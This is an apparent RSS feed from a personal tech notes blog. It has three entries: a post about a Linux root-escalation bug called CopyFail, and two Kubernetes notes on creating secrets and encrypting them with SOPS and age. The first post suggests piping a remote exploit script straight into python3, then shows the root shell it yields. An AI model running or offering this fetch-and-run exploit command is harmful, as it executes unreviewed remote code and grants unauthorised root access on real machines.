Atomic on th0thhttps://th0th.dev/tags/atomic/Recent content in Atomic on th0thHugoen-usMon, 04 May 2026 21:24:41 +0000My Laptop Got Pwn'dhttps://th0th.dev/notes/laptop/Mon, 04 May 2026 21:24:41 +0000https://th0th.dev/notes/laptop/<p><a href="https://www.youtube.com/watch?v=lkifbWtxxlk"> 732 bytes of Python just borked every Linux machine on earth…</a></p> <p>I ingest alot of news and articles each day but this video from Fireship just seemed like another nothing burger.. well I was wrong.</p> <p>I won&rsquo;t go into detail on the vulnerability but you can verify if your Linux based systems are vulnerable by running this PoC and reviwing the associated article for more context. <a href="https://copy.fail/">CopyFail</a>:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl https://copy.fail/exp | python3 <span style="color:#f92672">&amp;&amp;</span> su </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>$ id </span></span><span style="display:flex;"><span>uid<span style="color:#f92672">=</span>0<span style="color:#f92672">(</span>root<span style="color:#f92672">)</span> gid<span style="color:#f92672">=</span>1000<span style="color:#f92672">(</span>fr3d<span style="color:#f92672">)</span> groups<span style="color:#f92672">=</span>1000<span style="color:#f92672">(</span>fr3d<span style="color:#f92672">)</span>,24<span style="color:#f92672">(</span>cdrom<span style="color:#f92672">)</span>,25<span style="color:#f92672">(</span>floppy<span style="color:#f92672">)</span>,29<span style="color:#f92672">(</span>audio<span style="color:#f92672">)</span>,30<span style="color:#f92672">(</span>dip<span style="color:#f92672">)</span>,44<span style="color:#f92672">(</span>video<span style="color:#f92672">)</span>,46<span style="color:#f92672">(</span>plugdev<span style="color:#f92672">)</span>,100<span style="color:#f92672">(</span>users<span style="color:#f92672">)</span>,104<span style="color:#f92672">(</span>kvm<span style="color:#f92672">)</span>,106<span style="color:#f92672">(</span>netdev<span style="color:#f92672">)</span>,111<span style="color:#f92672">(</span>bluetooth<span style="color:#f92672">)</span>,113<span style="color:#f92672">(</span>lpadmin<span style="color:#f92672">)</span>,116<span style="color:#f92672">(</span>scanner<span style="color:#f92672">)</span>,126<span style="color:#f92672">(</span>libvirt<span style="color:#f92672">)</span>,995<span style="color:#f92672">(</span>docker<span style="color:#f92672">)</span> </span></span></code></pre></div>Create onepassword-token For k8shttps://th0th.dev/notes/202601191659/Mon, 19 Jan 2026 16:59:57 +0000https://th0th.dev/notes/202601191659/<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>k create secret generic onepassword-connect-secret <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>--from-file<span style="color:#f92672">=</span>./1password-credentials.json -o yaml &gt; infrastructure/configs/base/onepassword-connect/1_secrets.yaml </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>kubectl create secret generic onepassword-connect-secret -n onepassword --from-literal<span style="color:#f92672">=</span>1password-credentials.json<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">$(</span>cat ./utils/1password-credentials.json | base64<span style="color:#66d9ef">)</span><span style="color:#e6db74">&#34;</span> --dry-run<span style="color:#f92672">=</span>client -o yaml &gt; infrastructure/configs/base/onepassword-connect/1_secrets.yaml </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>kubectl create secret -n external-secrets generic onepassword-token --from-literal<span style="color:#f92672">=</span>token<span style="color:#f92672">=</span>$OP_CONNECT_TOKEN </span></span></code></pre></div>Encrypt secrets with SOPShttps://th0th.dev/notes/202601152309/Thu, 15 Jan 2026 23:09:41 +0000https://th0th.dev/notes/202601152309/<p>Generate an age keypair and save it to <code>age.agekey</code>. The public key is used for encryption; keep the private key safe — you&rsquo;ll need it to decrypt.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>$ age-keygen -o age.agekey </span></span><span style="display:flex;"><span>Public key: age1helqcqsh9464r8chnwc2fzj8uv7vr5ntnsft0tn45v2xtz0hpfwq98cmsg </span></span></code></pre></div><p>Store the private key as a Kubernetes secret in the <code>flux-system</code> namespace so Flux&rsquo;s SOPS decryption provider can use it to decrypt manifests at apply time.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>cat age.agekey | </span></span><span style="display:flex;"><span>kubectl create secret generic sops-age <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>--namespace<span style="color:#f92672">=</span>flux-system <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>--from-file<span style="color:#f92672">=</span>age.agekey<span style="color:#f92672">=</span>/dev/stdin </span></span></code></pre></div><p>Encrypt a Kubernetes secret YAML in-place using SOPS. Only fields matching <code>data</code> or <code>stringData</code> are encrypted, leaving the rest of the manifest readable.</p>